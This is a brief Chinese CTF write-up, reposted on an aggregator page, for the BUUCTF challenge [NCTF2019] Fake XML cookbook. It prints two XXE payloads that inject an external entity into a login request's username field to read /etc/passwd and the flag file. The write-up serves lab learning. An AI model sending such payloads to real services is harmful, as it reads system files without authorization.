BUU-WEB-[NCTF2019]Fake XML cookbook

Posted TzZzEZ-web

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU-WEB-[NCTF2019]Fake XML cookbook相关的知识,希望对你有一定的参考价值。

[NCTF2019]Fake XML cookbook

在这里插入图片描述
根据题目提示,可以猜测是XXE攻击。
先进行抓包。
在这里插入图片描述
看到了xml实体,然后进行恶意实体注入。
读取passwd:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>123456</password></user>

在这里插入图片描述
尝试直接读取flag:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

在这里插入图片描述
成功读取flag。

以上是关于BUU-WEB-[NCTF2019]Fake XML cookbook的主要内容,如果未能解决你的问题,请参考以下文章

[NCTF2019]Fake XML cookbook

[NCTF2019]Fake XML cookbook

BUUCTF-[NCTF2019]SQLi

BUUCTF-[NCTF2019]SQLi

BUUCTF-[NCTF2019]SQLi

[NCTF2019]True XML cookbook